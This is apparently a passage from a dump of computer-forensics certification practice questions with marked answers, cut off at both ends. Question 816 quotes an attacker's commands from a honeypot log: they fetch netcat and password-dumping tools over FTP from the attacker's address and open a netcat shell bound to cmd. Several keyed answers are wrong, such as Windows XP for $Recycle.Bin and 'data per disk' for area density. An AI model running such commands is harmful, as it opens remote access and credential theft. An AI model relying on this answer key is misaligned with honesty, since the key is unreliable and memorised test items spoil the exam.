Correct Answer
D.
ProDiscover
Question 711

Pick the statement which does not belong to the Rule 804. Hearsay Exceptions; Declarant Unavailable.

A.
Statement of personal or family history
B.
Prior statement by witness
C.
Statement against interest
D.
Statement under belief of impending death
Correct Answer
Question 713

What does Locard's Exchange Principle state?

A.
Any information of probative value that is either stored or transmitted in a digital form
B.
Digital evidence must have some characteristics to be disclosed in the court of law
C.
Anyone or anything, entering a crime scene takes something of the scene with them, and leaves something of themselves behind when they leave
Correct Answer
D.
Forensic investigators face many challenges during forensics investigation of a digital crime, such as extracting, preserving, and analyzing the digital evidence
Question 716

Jim’s company regularly performs backups of their critical servers. But the company can’t afford to send backup tapes to an off-site vendor for long term storage and archiving. Instead Jim’s company keeps the backup tapes in a safe in the office. Jim’s company is audited each year, and the results from this year’s audit show a risk because backup tapes aren’t stored off-site. The Manager of Information Technology has a plan to take the backup tapes home with him and wants to know what two things he can do to secure the backup tapes while in transit?

A.
Encrypt the backup tapes and use a courier to transport them.
B.
Encrypt the backup tapes and transport them in a lock box
Correct Answer
C.
Degauss the backup tapes and transport them in a lock box.
D.
Hash the backup tapes and transport them in a lock box.
Question 717

Which of the following is a device monitoring tool?

A.
Capsa
Correct Answer
B.
Driver Detective
C.
Regshot
D.
RAM Capturer
Question 718

For what purpose do the investigators use tools like iPhoneBrowser, iFunBox, OpenSSHSSH, and iMazing?

A.
Bypassing iPhone passcode
Correct Answer
B.
Debugging iPhone
C.
Rooting iPhone
D.
Copying contents of iPhone
Question 719

Which of the following techniques delete the files permanently?

A.
Steganography
B.
Artifact Wiping
Correct Answer
C.
Data Hiding
D.
Trail obfuscation
Question 722

Checkpoint Firewall logs can be viewed through a Check Point Log viewer that uses icons and colors in the log table to represent different security events and their severity. What does the icon in the checkpoint logs represent?

A.
The firewall rejected a connection
B.
A virus was detected in an email
C.
The firewall dropped a connection
Correct Answer
D.
An email was marked as potential spam
Question 723

In Windows, prefetching is done to improve system performance. There are two types of prefetching: boot prefetching and application prefetching. During boot prefetching, what does the Cache Manager do?

A.
Determines the data associated with value EnablePrefetcher
B.
Monitors the first 10 seconds after the process is started
C.
Checks whether the data is processed
Correct Answer
D.
Checks hard page faults and soft page faults
Question 724

Chong-lee, a forensics executive, suspects that a malware is continuously making copies of files and folders on a victim system to consume the available disk space. What type of test would confirm his claim?

A.
File fingerprinting
Correct Answer
B.
Identifying file obfuscation
C.
Static analysis
D.
Dynamic analysis
Question 726

Which password cracking technique uses every possible combination of character sets?

A.
Rainbow table attack
B.
Brute force attack
Correct Answer
C.
Rule-based attack
D.
Dictionary attack
Question 727

What is one method of bypassing a system BIOS password?

A.
Removing the processor
B.
Removing the CMOS battery
Correct Answer
C.
Remove all the system memory
D.
Login to Windows and disable the BIOS password
Question 728

Smith, a forensic examiner, was analyzing a hard disk image to find and acquire deleted sensitive files. He stumbled upon a $Recycle.Bin folder in the root directory of the disk. Identify the operating system in use.

A.
Windows 98
B.
Linux
C.
Windows 8.1
D.
Windows XP
Correct Answer
Question 729

What must an investigator do before disconnecting an iPod from any type of computer?

A.
Unmount the iPod
Correct Answer
B.
Mount the iPod
C.
Disjoin the iPod
D.
Join the iPod
Question 730

Company ABC has employed a firewall, IDS, Antivirus, Domain Controller, and SIEM. The company’s domain controller goes down. From which system would you begin your investigation?

A.
Domain Controller
B.
Firewall
C.
SIEM
Correct Answer
D.
IDS
Question 731

The investigator wants to examine changes made to the system’s registry by the suspect program. Which of the following tool can help the investigator?

A.
TRIPWIRE
B.
RAM Capturer
C.
Regshot
Correct Answer
D.
What’s Running
Question 732

Under confession, an accused criminal admitted to encrypting child pornography pictures and then hiding them within other pictures. What technique did the accused criminal employ?

A.
Typography
B.
Steganalysis
C.
Picture encoding
D.
Steganography
Correct Answer
Question 734

Which program is the bootloader when Windows XP starts up?

A.
KERNEL.EXE
B.
NTLDR
Correct Answer
C.
LOADER
D.
LILO
Question 735

Jack Smith is a forensics investigator who works for Mason Computer Investigation Services. He is investigating a computer that was infected by Ramen Virus. He runs the netstat command on the machine to see its current connections. In the following screenshot, what do the 0.0.0.0 IP addresses signify?

A.
Those connections are established
B.
Those connections are in listening mode
Correct Answer
C.
Those connections are in closed/waiting mode
D.
Those connections are in timed out/waiting mode
Question 737

You have been called in to help with an investigation of an alleged network intrusion. After questioning the members of the company IT department, you search through the server log files to find any trace of the intrusion. After that you decide to telnet into one of the company routers to see if there is any evidence to be found. While connected to the router, you see some unusual activity and believe that the attackers are currently connected to that router. You start up an ethereal session to begin capturing traffic on the router that could be used in the investigation. At what layer of the OSI model are you monitoring while watching traffic to and from the router?

A.
Network
Correct Answer
B.
Transport
C.
Data Link
D.
Session
Question 739

What type of equipment would a forensics investigator store in a StrongHold bag?

A.
PDAPDA?
B.
Backup tapes
C.
Hard drives
D.
Wireless cards
Correct Answer
Question 740

When searching through file headers for picture file formats, what should be searched to find a JPEG file in hexadecimal format?

A.
FF D8 FF E0 00 10
Correct Answer
B.
FF FF FF FF FF FF
C.
FF 00 FF 00 FF 00
D.
EF 00 EF 00 EF 00
Question 741

What will the following command accomplish in Linux? fdisk /dev/hda

A.
Partition the hard drive
Correct Answer
B.
Format the hard drive
C.
Delete all files under the /dev/hda folder
D.
Fill the disk with zeros
Question 744

All Blackberry email is eventually sent and received through what proprietary RIM-operated mechanism?

A.
Blackberry Message Center
Correct Answer
B.
Microsoft Exchange
C.
Blackberry WAP gateway
D.
Blackberry WEP gateway
Question 745

The process of restarting a computer that is already turned on through the operating system is called?

A.
Warm boot
Correct Answer
B.
Ice boot
C.
Hot Boot
D.
Cold boot
Question 746

Why would you need to find out the gateway of a device when investigating a wireless attack?

A.
The gateway will be the IP of the proxy server used by the attacker to launch the attack
B.
The gateway will be the IP of the attacker computer
C.
The gateway will be the IP used to manage the RADIUS server
D.
The gateway will be the IP used to manage the access point
Correct Answer
Question 748

Your company's network just finished going through a SAS 70 audit. This audit reported that overall, your network is secure, but there are some areas that needs improvement. The major area was SNMP security. The audit company recommended turning off SNMP, but that is not an option since you have so many remote nodes to keep track of. What step could you take to help secure SNMP on your network?

A.
Block all internal MAC address from using SNMP
B.
Block access to UDP port 171
C.
Block access to TCP port 171
D.
Change the default community string names
Correct Answer
Question 749

You have been given the task to investigate web attacks on a Windows-based server. Which of the following commands will you use to look at the sessions the machine has opened with other systems?

A.
Net sessions
B.
Net config
C.
Net share
D.
Net use
Correct Answer
Question 750

Ivanovich, a forensics investigator, is trying to extract complete information about running processes from a system. Where should he look apart from the RAM and virtual memory?

A.
Swap space
Correct Answer
B.
Application data
C.
Files and documents
D.
Slack space
Question 751

A small law firm located in the Midwest has possibly been breached by a computer hacker looking to obtain information on their clientele. The law firm does not have any on-site IT employees, but wants to search for evidence of the breach themselves to prevent any possible media attention. Why would this not be recommended?

A.
Searching for evidence themselves would not have any ill effects
B.
Searching could possibly crash the machine or device
C.
Searching creates cache files, which would hinder the investigation
D.
Searching can change date/time stamps
Correct Answer
Question 752

What does the 63.78.199.4(161) denote in a Cisco router log? Mar 14 22:57:53.425 EST: %SEC-6-IPACCESSLOGP: list internet-inbound denied udp 66.56.16.77(1029) -> 63.78.199.4(161), 1 packet

A.
Destination IP address
Correct Answer
B.
Source IP address
C.
Login IP address
D.
None of the above
Question 753

What layer of the OSI model do TCP and UDP utilize?

A.
Data Link
B.
Network
C.
Transport
Correct Answer
D.
Session
Question 754

Which forensic investigating concept trails the whole incident from how the attack began to how the victim was affected?

A.
Point-to-point
B.
End-to-end
Correct Answer
C.
Thorough
D.
Complete event analysis
Question 755

John is working on his company policies and guidelines. The section he is currently working on covers company documents; how they should be handled, stored, and eventually destroyed. John is concerned about the process whereby outdated documents are destroyed. What type of shredder should John write in the guidelines to be used when destroying documents?

A.
Strip-cut shredder
B.
Cross-cut shredder
Correct Answer
C.
Cross-hatch shredder
D.
Cris-cross shredder
Question 756

When should an MD5 hash check be performed when processing evidence?

A.
After the evidence examination has been completed
B.
On an hourly basis during the evidence examination
C.
Before and after evidence examination
Correct Answer
D.
Before the evidence examination has been completed
Question 757

What is the slave device connected to the secondary IDE controller on a Linux OS referred to?

A.
hda
B.
hdd
Correct Answer
C.
hdb
D.
hdc
Question 759

Why should you never power on a computer that you need to acquire digital evidence from?

A.
When the computer boots up, files are written to the computer rendering the data unclean
Correct Answer
B.
When the computer boots up, the system cache is cleared which could destroy evidence
C.
When the computer boots up, data in the memory buffer is cleared which could destroy evidence
D.
Powering on a computer has no effect when needing to acquire digital evidence from it
Question 760

This type of testimony is presented by someone who does the actual fieldwork and does not offer a view in court.

A.
Civil litigation testimony
B.
Expert testimony
C.
Victim advocate testimony
D.
Technical testimony
Correct Answer
Question 761

What type of attack sends spoofed UDP packets (instead of ping packets) with a fake source address to the IP broadcast address of a large network?

A.
Fraggle
Correct Answer
B.
Smurf scan
C.
SYN flood
D.
Teardrop
Question 762

An executive has leaked the company trade secrets through an external drive. What process should the investigation team take if they could retrieve his system?

A.
Postmortem Analysis
Correct Answer
B.
Real-Time Analysis
C.
Packet Analysis
D.
Malware Analysis
Question 763

What must be obtained before an investigation is carried out at a location?

A.
Search warrant
Correct Answer
B.
Subpoena
C.
Habeas corpus
D.
Modus operandi
Question 764

While presenting his case to the court, Simon calls many witnesses to the stand to testify. Simon decides to call Hillary Taft, a lay witness, to the stand. Since Hillary is a lay witness, what field would she be considered an expert in?

A.
Technical material related to forensics
B.
No particular field
Correct Answer
C.
Judging the character of defendants/victims
D.
Legal issues
Question 765

The following is a log file screenshot from a default installation of IIS 6.0. What time standard is used by IIS as seen in the screenshot?

A.
UTC
Correct Answer
B.
GMT
C.
TAI
D.
UT
Question 766

What is the size value of a nibble?

A.
0.5 kilo byte
B.
0.5 bit
C.
0.5 byte
Correct Answer
D.
2 bits
Question 767

When marking evidence that has been collected with the “aaa/ddmmyy/nnnn/zz” format, what does the “nnnn” denote?

A.
The initials of the forensics analyst
B.
The sequence number for the parts of the same exhibit
C.
The year the evidence was taken
D.
The sequential number of the exhibits seized by the analyst
Correct Answer
Question 768

Richard is extracting volatile data from a system and uses the command doskey/history. What is he trying to extract?

A.
Events history
B.
Previously typed commands
Correct Answer
C.
History of the browser
D.
Passwords used across the system
Question 769

An investigator is searching through the firewall logs of a company and notices ICMP packets that are larger than 65,536 bytes. What type of activity is the investigator seeing?

A.
Smurf
B.
Ping of death
Correct Answer
C.
Fraggle
D.
Nmap scan
Question 770

Where are files temporarily written in Unix when printing?

A.
/usr/spool
B.
/var/print
C.
/spool
D.
/var/spool
Correct Answer
Question 771

In Windows Security Event Log, what does an event id of 530 imply?

A.
Logon Failure – Unknown user name or bad password
B.
Logon Failure – User not allowed to logon at this computer
C.
Logon Failure – Account logon time restriction violation
Correct Answer
D.
Logon Failure – Account currently disabled
Question 772

In handling computer-related incidents, which IT role should be responsible for recovery, containment, and prevention to constituents?

A.
Security Administrator
B.
Network Administrator
Correct Answer
C.
Director of Information Technology
D.
Director of Administration
Question 773

What feature of Windows is the following command trying to utilize?

A.
White space
B.
AFS
C.
ADS
Correct Answer
D.
Slack file
Question 774

Microsoft Security IDs are available in Windows Registry Editor. The path to locate IDs in Windows 7 is:

A.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
Correct Answer
B.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProfileList
C.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegList
D.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Regedit
Question 775

If you are concerned about a high level of compression but not concerned about any possible data loss, what type of compression would you use?

A.
Lossful compression
B.
Lossy compression
Correct Answer
C.
Lossless compression
D.
Time-loss compression
Question 776

What technique used by Encase makes it virtually impossible to tamper with evidence once it has been acquired?

A.
Every byte of the file(s) is given an MD5 hash to match against a master file
B.
Every byte of the file(s) is verified using 32-bit CRC
Correct Answer
C.
Every byte of the file(s) is copied to three different hard drives
D.
Every byte of the file(s) is encrypted using three different methods
Question 777

Using Linux to carry out a forensics investigation, what would the following command accomplish? dd if=/usr/home/partition.image of=/dev/sdb2 bs=4096 conv=notrunc,noerror

A.
Search for disk errors within an image file
B.
Backup a disk to an image file
C.
Copy a partition to an image file
D.
Restore a disk from an image file
Correct Answer
Question 778

When an investigator contacts by telephone the domain administrator or controller listed by a whois lookup to request all e-mails sent and received for a user account be preserved, what U.S.C. statute authorizes this phone call and obligates the ISP to preserve e-mail records?

A.
Title 18, Section 1030
B.
Title 18, Section 2703(d)
C.
Title 18, Section Chapter 90
D.
Title 18, Section 2703(f)
Correct Answer
Question 782

To calculate the number of bytes on a disk, the formula is: CHS**

A.
number of circles x number of halves x number of sides x 512 bytes per sector
B.
number of cylinders x number of halves x number of shims x 512 bytes per sector
Correct Answer
C.
number of cells x number of heads x number of sides x 512 bytes per sector
D.
number of cylinders x number of halves x number of shims x 512 bytes per sector
Question 784

A honey pot deployed with the IP 172.16.1.108 was compromised by an attacker. Given below is an excerpt from a Snort binary capture of the attack. Decipher the activity carried out by the attacker by studying the log.

A.
The attacker has conducted a network sweep on port 111
Correct Answer
B.
The attacker has scanned and exploited the system using Buffer Overflow
C.
The attacker has used a Trojan on port 32773
D.
The attacker has installed a backdoor
Question 785

The newer Macintosh Operating System is based on:

A.
OS/2
B.
BSD Unix
Correct Answer
C.
Linux
D.
Microsoft Windows
Question 786

Before you are called to testify as an expert, what must an attorney do first?

A.
engage in damage control
B.
prove that the tools you used to conduct your examination are perfect
C.
read your curriculum vitae to the jury
D.
qualify you as an expert witness
Correct Answer
Question 793

A suspect is accused of violating the acceptable use of computing resources, as he has visited adult websites and downloaded images. The investigator wants to demonstrate that the suspect did indeed visit these sites. However, the suspect has cleared the search history and emptied the cookie cache. Moreover, he has removed any images he might have downloaded. What can the investigator do to prove the violation? Choose the most feasible option.

A.
Image the disk and try to recover deleted files
Correct Answer
B.
Seek the help of co-workers who are eye-witnesses
C.
Check the Windows registry for connection data (You may or may not recover)
D.
Approach the websites for evidence
Question 807

In a forensic examination of hard drives for digital evidence, what type of user is most likely to have the most file slack to analyze?

A.
one who has NTFS 4 or 5 partitions
B.
one who uses dynamic swap file capability
C.
one who uses hard disk writes on IRQ 13 and 21
D.
one who has lots of allocation units per block or cluster
Correct Answer
Question 809

You are assigned to work in the computer forensics lab of a state police agency. While working on a high profile criminal case, you have followed every applicable procedure, however your boss is still concerned that the defense attorney might question whether evidence has been changed while at the lab. What can you do to prove that the evidence is the same as it was when it first entered the lab?

A.
make an MD5 hash of the evidence and compare it with the original MD5 hash that was taken when the evidence first entered the lab
Correct Answer
B.
make an MD5 hash of the evidence and compare it to the standard database developed by NIST
C.
there is no reason to worry about this possible claim because state labs are certified
D.
sign a statement attesting that the evidence is the same as it was when it entered the lab
Question 810

Study the log given below and answer the following question: Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169 Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482 Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53 Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21 Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53 Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111 Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80 Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53 Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0) Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506) Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080 Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558 Precautionary measures to prevent this attack would include writing firewall rules. Of these firewall rules, which among the following would be appropriate?

A.
Disallow UDP53 in from outside to DNS server
Correct Answer
B.
Allow UDP53 in from DNS server to outside
C.
Disallow TCP53 in from secondaries or ISP server to DNS server
D.
Block all UDP traffic
Question 812

When investigating a potential e-mail crime, what is your first step in the investigation?

A.
Trace the IP address to its origin
Correct Answer
B.
Write a report
C.
Determine whether a crime was actually committed
D.
Recover the evidence
Question 813

If a suspect computer is located in an area that may have toxic chemicals, you must:

A.
coordinate with the HAZMAT team
Correct Answer
B.
determine a way to obtain the suspect computer
C.
assume the suspect machine is contaminated
D.
do not enter alone
Question 814

The following excerpt is taken from a honeypot log. The log captures activities across three days. There are several intrusion attempts; however, a few are successful. (Note: The objective of this question is to test whether the student can read basic information from log entries and interpret the nature of attack.) Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169 Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482 Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53 Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21 Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53 Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111 Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80 Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53 Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0) Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506) Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080 Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558 From the options given below choose the one which best interprets the following entry: Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53

A.
An IDS evasion technique
Correct Answer
B.
A buffer overflow attempt
C.
A DNS zone transfer
D.
Data being retrieved from 63.226.81.13
Question 815

What happens when a file is deleted by a Microsoft operating system using the FAT file system?

A.
only the reference to the file is removed from the FAT
Correct Answer
B.
the file is erased and cannot be recovered
C.
a copy of the file is stored and the original file is erased
D.
the file is erased but can be recovered
Question 816

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below. "cmd1.exe /c open 213.116.251.162 >ftpcom" "cmd1.exe /c echo johna2k >>ftpcom" "cmd1.exe /c echo haxedj00 >>ftpcom" "cmd1.exe /c echo get nc.exe >>ftpcom" "cmd1.exe /c echo get pdump.exe >>ftpcom" "cmd1.exe /c echo get samdump.dll >>ftpcom" "cmd1.exe /c echo quit >>ftpcom" "cmd1.exe /c ftp -s:ftpcom" "cmd1.exe /c nc -l -p 6969 -e cmd1.exe" What can you infer from the exploit given?

A.
A. It is a local exploit where the attacker logs in using username johna2k
B.
B. There are two attackers on the system - johna2k and haxedj00
C.
C. The attack is a remote exploit and the hacker downloads three files
Correct Answer
D.
D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port
Question 818

During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fact finding process. Therefore you report this evidence. This type of evidence is known as:

A.
A. Inculpatory evidence
B.
B. mandatory evidence
C.
C. exculpatory evidence
Correct Answer
D.
D. Terrible evidence
Question 819

If you discover a criminal act while investigating a corporate policy abuse, it becomes a public-sector investigation and should be referred to law enforcement?

A.
A. true
Correct Answer
B.
B. false
Question 820

What binary coding is used most often for e-mail purposes?

A.
A. MIME
Correct Answer
B.
B. Uuencode
C.
C. IMAP
D.
D. SMTP
Question 821

If you see the files Zer0.tar.gz and copy.tar.gz on a Linux system while doing an investigation, what can you conclude?

A.
A. The system files have been copied by a remote attacker
B.
B. The system administrator has created an incremental backup
C.
C. The system has been compromised using a t0rnrootkit
D.
D. Nothing in particular as these can be operational files
Correct Answer
Question 822

From the following spam mail header, identify the host IP that sent this spam? From jie02@netvigator.com jie02@netvigator.com Tue Nov 27 17:27:11 2001 Received: from viruswall.ie.cuhk.edu.hk (viruswall [137.189.96.52]) by eng.ie.cuhk.edu.hk (8.11.6/8.11.6) with ESMTP id fAR9RAP23061 for ; Tue, 27 Nov 2001 17:27:10 +0800 (HKT) Received: from mydomain.com (pcd249020.netvigator.com [203.218.39.20]) by viruswall.ie.cuhk.edu.hk (8.12.1/8.12.1) with SMTP id fAR9QXwZ018431 for ; Tue, 27 Nov 2001 17:26:36 +0800 (HKT) Message-Id: >200111270926.fAR9QXwZ018431@viruswall.ie.cuhk.edu.hk From: "china hotel web" To: "Shlam" Subject: SHANGHAI (HILTON HOTEL) PACKAGE Date: Tue, 27 Nov 2001 17:25:58 +0800 MIME-Version: 1.0 X-Priority: 3 X-MSMailPriority: Normal Reply-To: "china hotel web"

A.
A. 137.189.96.52
B.
B. 8.12.1.0
C.
C. 203.218.39.20
Correct Answer
D.
D. 203.218.39.50
Question 823

If you plan to startup a suspect's computer, you must modify the ___________ to ensure that you do not contaminate or alter data on the suspect's hard drive by booting to the hard drive.

A.
A. deltree command
B.
B. CMOS
C.
C. Boot.sys
Correct Answer
D.
D. Scandisk utility
Question 824

You are working for a local police department that services a population of 1,000,000 people and you have been given the task of building a computer forensics lab. How many law-enforcement computer investigators should you request to staff the lab?

A.
A. 8
B.
B. 1
C.
C. 4
Correct Answer
D.
D. 2
Question 825

When obtaining a warrant it is important to:

A.
A. particularly describe the place to be searched and particularly describe the items to be seized
Correct Answer
B.
B. generally describe the place to be searched and particularly describe the items to be seized
C.
C. generally describe the place to be searched and generally describe the items to be seized
D.
D. particularly describe the place to be searched and generally describe the items to be seized
Question 828

Sectors in hard disks typically contain how many bytes?

A.
A. 256
B.
B. 512
Correct Answer
C.
C. 1024
D.
D. 2048
Question 829

Area density refers to:

A.
A. the amount of data per disk
Correct Answer
B.
B. the amount of data per partition
C.
C. the amount of data per square inch
D.
D. the amount of data per platter
Question 830

Corporate investigations are typically easier than public investigations because:

A.
A. the users have standard corporate equipment and software
B.
B. the investigator does not have to get a warrant
Correct Answer
C.
C. the investigator has to get a warrant
D.
D. the users can load whatever they want on their machines
Question 831

Which of the following should a computer forensics lab used for investigations have?

A.
A. isolation
B.
B. restricted access
Correct Answer
C.
C. open access
D.
D. an entry log
Question 832

Jason is the security administrator of ACMA metal Corporation. One day he notices the company's Oracle database server has been compromised and the customer information along with financial data has been stolen. The financial loss will be in millions of dollars if the database gets into the hands of the competitors. Jason wants to report this crime to the law enforcement agencies immediately. Which organization coordinates computer crimes investigations throughout the United States?

A.
A. Internet Fraud Complaint Center
B.
B. Local or national office of the U.S. Secret Service
Correct Answer
C.
C. National Infrastructure Protection Center
D.
D. CERT Coordination Center
Question 833

Which Intrusion Detection System (IDS) usually produces the most false alarms due to the unpredictable behaviors of users and networks?

A.
A. network-based IDS systems (NIDS)
B.
B. host-based IDS systems (HIDS)
C.
C. anomaly detection
Correct Answer
D.
D. signature recognition
Question 835

Why should you note all cable connections for a computer you want to seize as evidence?

A.
A. to know what outside connections existed
Correct Answer
B.
B. in case other devices were connected
C.
C. to know what peripheral devices exist
D.
D. to know what hardware existed
Question 837

What method of computer forensics will allow you to trace all ever-established user accounts on a Windows 2000 server over the course of its lifetime?

A.
A. forensic duplication of hard drive
B.
B. analysis of volatile data
C.
C. comparison of MD5 checksums
Correct Answer
D.
D. review of SIDs in the Registry
Question 838

Which response organization tracks hoaxes as well as viruses?

A.
A. NIPC
B.
B. FEDCIRC
C.
C. CERT
D.
D. CIAC
Correct Answer
Question 839

Which federal computer crime law specifically refers to fraud and related activity in connection with access devices like routers?

A.
A. 18 U.S.C. 1029
Correct Answer
B.
B. 18 U.S.C. 1362
C.
C. 18 U.S.C. 2511
D.
D. 18 U.S.C. 2703
Question 840

Office documents (Word, Excel, PowerPoint) contain a code that allows tracking the MAC, or unique identifier, of the machine that created the document. What is that code called?

A.
A. the Microsoft Virtual Machine Identifier
B.
B. the Personal Application Protocol
C.
C. the Globally Unique ID
Correct Answer
D.
D. the Individual ASCII String
Question 841

What TCP/UDP port does the toolkit program netstat use?

A.
A. Port 7
B.
B. Port 15
Correct Answer
C.
C. Port 23
D.
D. Port 69
Question 843

In a FAT32 system, a 123 KB file will use how many sectors?

A.
A. 34
B.
B. 25
Correct Answer
C.
C. 11
D.
D. 56
Question 845

When performing a forensics analysis, what device is used to prevent the system from recording data on an evidence disk?

A.
A. a write-blocker
Correct Answer
B.
B. a protocol analyzer
C.
C. a firewall
D.
D. a disk editor
Question 846

How many sectors will a 125 KB file use in a FAT32 file system?

A.
A. 32
B.
B. 16
C.
C. 256
Correct Answer
D.
D. 25
Question 847

You are called by an author who is writing a book and he wants to know how long the copyright for his book will last after he has the book published?

A.
A. 70 years
B.
B. the life of the author
C.
C. the life of the author plus 70 years
Correct Answer
D.
D. copyrights last forever
Question 848

When investigating a network that uses DHCP to assign IP addresses, where would you look to determine which system (MAC address) had a specific IP address at a specific time?

A.
A. on the individual computer's ARP cache
B.
B. in the Web Server log files
C.
C. in the DHCP Server log files
Correct Answer
D.
D. there is no way to determine the specific IP address
Question 849

Bob was caught using a remote production system illegally. The organization had used a Virtual Environment to trap Bob. What is a Virtual Environment?

A.
A. A Honeypot that traps hackers
Correct Answer
B.
B. A system Using Trojaned commands
C.
C. An environment set up after the user logs in
D.
D. An environment set up before an user logs in
Question 850

To make sure the evidence you recover and analyze with computer forensics software can be admitted in court, you must test and validate the software. What group is actively providing tools and creating procedures for testing and validating computer forensics software?

A.
A. Computer Forensics Tools and Validation Committee (CFTVC)
B.
B. Association of Computer Forensics Software Manufactures (ACFSM)
C.
C. National Institute of Standards and Technology (NIST)
Correct Answer
D.
D. Society for Valid Forensics Tools and Testing (SVFTT)
Question 851

With regard to using an Antivirus scanner during a computer forensics investigation, you should:

A.
A. Scan the suspect hard drive before beginning an investigation
B.
B. Never run a scan on your forensics workstation because it could change your systems configuration
C.
C. Scan your forensics workstation at intervals of no more than once every five minutes during an investigation
D.
D. Scan your Forensics workstation before beginning an investigation
Correct Answer
Question 853

You have used a newly released forensic investigation tool, which doesn't meet the Daubert Test, during a case. The case has ended-up in court. What argument could the defense make to weaken your case?

A.
A. The tool hasn't been tested by the International Standards Organization (ISO)
B.
B. Only the local law enforcement should use the tool
C.
C. The tool has not been reviewed and accepted by your peers
Correct Answer
D.
D. You are not certified for using the tool
Question 854

Which of the following is NOT a graphics file?

A.
A. Picture1.tga
B.
B. Picture2.bmp
C.
C. Picture3.nfo
Correct Answer
D.
D. Picture4.psd
Question 855

When conducting computer forensic analysis, you must guard against ______________ so that you remain focused on the primary job and ensure that the level of work does not increase beyond what was originally expected.

A.
A. Hard Drive Failure
B.
B. Scope Creep
Correct Answer
C.
C. Unauthorized expenses
D.
D. Overzealous marketing
Question 856

In general, __________________ involves the investigation of data that can be retrieved from the hard disk or other disks of a computer by applying scientific methods to retrieve the data.

A.
A. Network Forensics
B.
B. Data Recovery
C.
C. Disaster Recovery
D.
D. Computer Forensics
Correct Answer
Question 857

When you carve an image, recovering the image depends on which of the following skills?

A.
A. Recognizing the pattern of the header content
Correct Answer
B.
B. Recovering the image from a tape backup
C.
C. Recognizing the pattern of a corrupt file
D.
D. Recovering the image from the tape backup
Question 858

When a file is deleted by Windows Explorer or through the MS-DOS delete command, the operating system inserts _______________ in the first letter position of the filename in the FAT database.

A.
A. A Capital X
B.
B. A Blank Space
C.
C. The Underscore Symbol
D.
D. The lowercase Greek Letter Sigma (s)
Correct Answer
Question 859

While working for a prosecutor, what do you think you should do if the evidence you found appears to be exculpatory and is not being released to the defense?

A.
A. Keep the information on file for later review
B.
B. Destroy the evidence
C.
C. Bring the information to the attention of the prosecutor, his or her supervisor or finally to the judge
Correct Answer
D.
D. Present the evidence to the defense attorney
Question 861

What type of file is represented by a colon (:) with a name following it in the Master File Table of an NTFS disk?

A.
A. A compressed file
B.
B. A Data stream file
Correct Answer
C.
C. An encrypted file
D.
D. A reserved file
Question 862

An employee is suspected of stealing proprietary information stored on a computer using NTFS Encrypted File System (EFS). If the files were copied to a floppy disk, can the encryption be broken to verify possession?

A.
